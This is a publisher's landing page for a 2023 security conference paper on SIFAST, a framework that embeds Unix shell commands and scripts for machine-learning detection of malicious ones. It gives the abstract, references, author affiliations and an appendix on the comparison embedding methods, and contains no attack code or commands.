SIFAST: An Efficient Unix Shell Embedding Framework for Malicious Detection

Chen, Songyue; Yang, Rong; Zhang, Hong; Wu, Hongwei; Zheng, Yanqin; Fu, Xingyu; Liu, Qingyun

doi:10.1007/978-3-031-49187-0_4

Songyue Chen ORCID: orcid.org/0009-0009-1969-1167^9,10,11,
Rong Yang^9,10,11,
Hong Zhang¹²,
Hongwei Wu^9,10,11,
Yanqin Zheng¹³,
Xingyu Fu^9,10,11 &
…
Qingyun Liu^9,10,11

Part of the book series: Lecture Notes in Computer Science ((LNCS,volume 14411))

Included in the following conference series:

International Conference on Information Security

356 Accesses

Abstract

Unix Shell is a powerful tool for system developers and engineers, but it poses serious security risks when used by cybercriminals to execute malicious scripts. These scripts can compromise servers, steal confidential data, or cause system crashes. Therefore, detecting and preventing malicious scripts is an important task for intrusion detection systems. In this paper, we propose a novel framework, called SIFAST, for embedding and detecting malicious Unix Shell scripts. Our framework consists of Smooth Inverse Frequency (SIF) and Abstract Syntax Tree (AST) techniques to rapidly convert Unix Shell commands and scripts into vectors and capture their semantic and syntactic features. These vectors can then be beneficial for various downstream machine learning models for classification or anomaly detection. Compared with other embedding methods with multiple downstream detection models, We have demonstrated that SIFAST can significantly improve the accuracy and efficiency on different downstream models. We also provide a supervised dataset of normal and abnormal Unix commands and scripts, which was collected from various open-source data. Hopefully, we can make a humble contribution to the field of intrusion detection systems by offering a solution to identifying malicious scripts in Unix Shell.

This is a preview of subscription content, log in via an institution to check access.

Access this chapter

Log in via an institution

Chapter: USD 29.95; Price excludes VAT (USA)

eBook: USD 69.99; Price excludes VAT (USA)

Softcover Book: USD 89.99; Price excludes VAT (USA)

Tax calculation will be finalised at checkout

Purchases are for personal use only

Institutional subscriptions

References

Different linux Commands and Utilities Commonly Used by Attackers. https://www.uptycs.com/blog/linux-commands-and-utilities-commonly-used-by-attackers
Evasive techniques used by malicious shell scripts on different unix systems. https://www.uptycs.com/blog/evasive-techniques-used-by-malicious-linux-shell-scripts
LOLBAS. https://lolbas-project.github.io/
Tree-sitter Using Parsers. https://tree-sitter.github.io/tree-sitter/using-parsers
What Is a Reverse Shell \(|\) Examples & Prevention Techniques \(|\) Imperva
Google Scholar
GTFOBins (2022). https://gtfobins.github.io/
Living Off the Land: How to Defend Against Malicious Use of Legitimate Utilities (2022). https://threatpost.com/living-off-the-land-malicious-use-legitimate-utilities/177762/
Al-Janabi, M., Altamimi, A.M.: A comparative analysis of machine learning techniques for classification and detection of Malware. In: 2020 21st International Arab Conference on Information Technology (ACIT), pp. 1–9 (2020). https://doi.org/10.1109/ACIT50332.2020.9300081
Alahmadi, A., Alkhraan, N., BinSaeedan, W.: MPSAutodetect: a malicious powershell script detection model based on stacked denoising auto-encoder. Comput. Secur. 116, 102658 (2022). https://doi.org/10.1016/j.cose.2022.102658
Article Google Scholar
Andrew, Y., Lim, C., Budiarto, E.: Mapping Linux shell commands to MITRE ATT &CK using NLP-based approach. In: 2022 International Conference on Electrical Engineering and Informatics (ICELTICs), pp. 37–42 (2022). https://doi.org/10.1109/ICELTICs56128.2022.9932097
Boffa, M., Milan, G., Vassio, L., Drago, I., Mellia, M., Ben Houidi, Z.: Towards NLP-based processing of honeypot logs. In: 2022 IEEE European Symposium on Security and Privacy Workshops (EuroS &PW), pp. 314–321 (2022). https://doi.org/10.1109/EuroSPW55150.2022.00038
Bohannon, D., Holmes, L.: Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science (2017)
Google Scholar
Bojanowski, P., Grave, E., Joulin, A., Mikolov, T.: Enriching Word Vectors with Subword Information (2017)
Google Scholar
Chai, H., Ying, L., Duan, H., Zha, D.: Invoke-Deobfuscation: AST-based and semantics-preserving deobfuscation for powershell scripts. In: 2022 52nd Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN), pp. 295–306 (2022). https://doi.org/10.1109/DSN53405.2022.00039
Elmasry, W., Akbulut, A., Zaim, A.H.: Deep learning approaches for predictive masquerade detection. Secur. Commun. Netw. 2018, e9327215 (2018). https://doi.org/10.1155/2018/9327215
Article Google Scholar
Fang, Y., Huang, C., Zeng, M., Zhao, Z., Huang, C.: JStrong: malicious JavaScript detection based on code semantic representation and graph neural network. Comput. Secur. 118, 102715 (2022). https://doi.org/10.1016/j.cose.2022.102715
Article Google Scholar
Fang, Y., Zhou, X., Huang, C.: Effective method for detecting malicious PowerShell scripts based on hybrid features. Neurocomputing 448, 30–39 (2021). https://doi.org/10.1016/j.neucom.2021.03.117
Article Google Scholar
Feng, Z., et al.: CodeBERT: a pre-trained model for programming and natural languages (2020). https://doi.org/10.48550/arXiv.2002.08155
Gao, T., Yao, X., Chen, D.: SimCSE: simple contrastive learning of sentence embeddings. In: Proceedings of the 2021 Conference on Empirical Methods in Natural Language Processing, pp. 6894–6910. Association for Computational Linguistics, Online and Punta Cana, Dominican Republic (2021). https://doi.org/10.18653/v1/2021.emnlp-main.552
Goudie, M.: The Rise of “Living off the Land” Attacks \(|\) CrowdStrike (2019). https://www.crowdstrike.com/blog/going-beyond-malware-the-rise-of-living-off-the-land-attacks/
Hendler, D., Kels, S., Rubin, A.: Detecting malicious powershell commands using deep neural networks. In: Proceedings of the 2018 on Asia Conference on Computer and Communications Security, pp. 187–197. ASIACCS ’18, Association for Computing Machinery, New York, NY, USA (2018). https://doi.org/10.1145/3196494.3196511
Hendler, D., Kels, S., Rubin, A.: AMSI-based detection of malicious powershell code using contextual embeddings. In: Proceedings of the 15th ACM Asia Conference on Computer and Communications Security, pp. 679–693. ASIA CCS ’20, Association for Computing Machinery, New York, NY, USA (2020). https://doi.org/10.1145/3320269.3384742
Hussain, Z., Nurminen, J., Mikkonen, T., Kowiel, M.: Command Similarity Measurement Using NLP (2021). https://doi.org/10.4230/OASIcs.SLATE.2021.13
Kidwai, A., et al.: A comparative study on shells in Linux: a review. Mater. Today Proc. 37, 2612–2616 (2021). https://doi.org/10.1016/j.matpr.2020.08.508
Article Google Scholar
Le, Q., Mikolov, T.: Distributed representations of sentences and documents. In: Proceedings of the 31st International Conference on International Conference on Machine Learning, vol. 32, pp. II-1188-II-1196. ICML’14, JMLR.org, Beijing, China (2014)
Google Scholar
Lin, X.V., Wang, C., Zettlemoyer, L., Ernst, M.D.: NL2Bash: a corpus and semantic parser for natural language interface to the Linux operating system (2018). arXiv:1802.08979 [cs]
Liu, C., et al.: Code execution with pre-trained language models (2023). https://doi.org/10.48550/arXiv.2305.05383
Liu, W., Mao, Y., Ci, L., Zhang, F.: A new approach of user-level intrusion detection with command sequence-to-sequence model. J. Intell. Fuzzy Syst. 38(5), 5707–5716 (2020). https://doi.org/10.3233/JIFS-179659
Article Google Scholar
Mikolov, T., Chen, K., Corrado, G., Dean, J.: Efficient estimation of word representations in vector space (2013). arXiv:1301.3781 [cs]
Mimura, M., Tajiri, Y.: Static detection of malicious PowerShell based on word embeddings. Internet Things 15, 100404 (2021). https://doi.org/10.1016/j.iot.2021.100404
Article Google Scholar
Ongun, T., et al.: Living-off-the-land command detection using active learning. In: Proceedings of the 24th International Symposium on Research in Attacks, Intrusions and Defenses, pp. 442–455. RAID ’21, Association for Computing Machinery, New York, NY, USA (2021). https://doi.org/10.1145/3471621.3471858
Peng, H., Mou, L., Li, G., Liu, Y., Zhang, L., Jin, Z.: Building program vector representations for deep learning. In: Zhang, S., Wirsing, M., Zhang, Z. (eds.) KSEM 2015. LNCS (LNAI), vol. 9403, pp. 547–553. Springer, Cham (2015). https://doi.org/10.1007/978-3-319-25159-2_49
Chapter Google Scholar
Rathore, H., Agarwal, S., Sahay, S.K., Sewak, M.: Malware detection using machine learning and deep learning. In: Mondal, A., Gupta, H., Srivastava, J., Reddy, P.K., Somayajulu, D.V.L.N. (eds.) BDA 2018. LNCS, vol. 11297, pp. 402–411. Springer, Cham (2018). https://doi.org/10.1007/978-3-030-04780-1_28
Chapter Google Scholar
Rebootuser: LinEnum (2023)
Google Scholar
Rousseau, A.: Hijacking.NET to Defend PowerShell (2017). https://doi.org/10.48550/arXiv.1709.07508
Song, J., Kim, J., Choi, S., Kim, J., Kim, I.: Evaluations of AI-based malicious PowerShell detection with feature optimizations. ETRI J. 43(3), 549–560 (2021). https://doi.org/10.4218/etrij.2020-0215
Article Google Scholar
Swissky: Payloads All The Things (2023)
Google Scholar
Trizna, D.: Shell language processing: Unix command parsing for machine learning (2021). arXiv:2107.02438 [cs]
Tsai, M.H., Lin, C.C., He, Z.G., Yang, W.C., Lei, C.L.: PowerDP: de-obfuscating and profiling malicious PowerShell commands with multi-label classifiers. IEEE Access 11, 256–270 (2023). https://doi.org/10.1109/ACCESS.2022.3232505
Article Google Scholar
Zhai, H., et al.: Masquerade detection based on temporal convolutional network. In: 2022 IEEE 25th International Conference on Computer Supported Cooperative Work in Design (CSCWD), pp. 305–310 (2022). https://doi.org/10.1109/CSCWD54268.2022.9776088

Download references

Acknowledgements

This work is supported by the Strategic Priority Research Program of the Chinese Academy of Sciences with No.XDC02030400, the Scaling Program of Institute of Information Engineering, CAS (Grant No. E3Z0041101), the Scaling Program of Institute of Information Engineering, CAS (Grant No. E3Z0191101).

Author information

Authors and Affiliations

Institute of Information Engineering, Chinese Academy of Science, Beijing, China
Songyue Chen, Rong Yang, Hongwei Wu, Xingyu Fu & Qingyun Liu
School of CyberSecurity, University of Chinese Academy of China, Beijing, China
Songyue Chen, Rong Yang, Hongwei Wu, Xingyu Fu & Qingyun Liu
National Engineering Laboratory of Information Security Technologies, Beijing, China
Songyue Chen, Rong Yang, Hongwei Wu, Xingyu Fu & Qingyun Liu
National Computer network Emergency Response technical Team/Coordination Center of China, Beijing, China
Hong Zhang
Chinatelecom Cloud, Beijing, China
Yanqin Zheng

Authors

Songyue Chen
View author publications
You can also search for this author in PubMed Google Scholar
Rong Yang
View author publications
You can also search for this author in PubMed Google Scholar
Hong Zhang
View author publications
You can also search for this author in PubMed Google Scholar
Hongwei Wu
View author publications
You can also search for this author in PubMed Google Scholar
Yanqin Zheng
View author publications
You can also search for this author in PubMed Google Scholar
Xingyu Fu
View author publications
You can also search for this author in PubMed Google Scholar
Qingyun Liu
View author publications
You can also search for this author in PubMed Google Scholar

Corresponding author

Correspondence to Rong Yang .

Editor information

Editors and Affiliations

University of Cyprus, Nicosia, Cyprus
Elias Athanasopoulos
Radboud University, Nijmegen, The Netherlands
Bart Mennink

Appendix

TF-IDF This is the most basic sentence vector generation method in the field of natural language, and it is also the sentence vector embedding method mentioned in Trizna et al. It first generates a TF-IDF representation of each word in a sentence, and then adds each word to form a TF-IDF representation of a sentence.
Doc2Vec [25] This is a method that trains the sentence vector and other words in the sentence to directly generate the sentence vector. Its method is similar to Word2Vec, but on the basis of Word2Vec, sentence vectors are added for joint training.
MPSAutodetect [9] This is a deep learning framework for detecting PowerShell malicious scripts, which uses a character-based embedding method and inputs it into a denoising AutoEncoder to extract features, and finally inputs the features into a classifier for classification.
SimCSE [19] An Advanced Pretrained Sentence Vector Embedding Model Based on Contrastive Learning. We employ the unsupervised learning part of SimCSE to learn code representations for shell scripts. Although SimCSE requires powerful hardware capabilities, making it impossible to be embedded in Unix, we still use it as one of our comparison objects to illustrate the gap between our model and conventional deep learning models.

Rights and permissions

Reprints and permissions

Copyright information

About this paper

Cite this paper

Chen, S. et al. (2023). SIFAST: An Efficient Unix Shell Embedding Framework for Malicious Detection. In: Athanasopoulos, E., Mennink, B. (eds) Information Security. ISC 2023. Lecture Notes in Computer Science, vol 14411. Springer, Cham. https://doi.org/10.1007/978-3-031-49187-0_4

Download citation

DOI: https://doi.org/10.1007/978-3-031-49187-0_4
Published: 01 December 2023
Publisher Name: Springer, Cham
Print ISBN: 978-3-031-49186-3
Online ISBN: 978-3-031-49187-0
eBook Packages: Computer ScienceComputer Science (R0)

Publish with us

Policies and ethics

SIFAST: An Efficient Unix Shell Embedding Framework for Malicious Detection

Abstract

Access this chapter

References

Acknowledgements

Author information

Authors and Affiliations

Corresponding author

Editor information

Editors and Affiliations

Appendix

Appendix

Rights and permissions

Copyright information

About this paper

Cite this paper

Download citation

Share this paper

Publish with us

Search

Navigation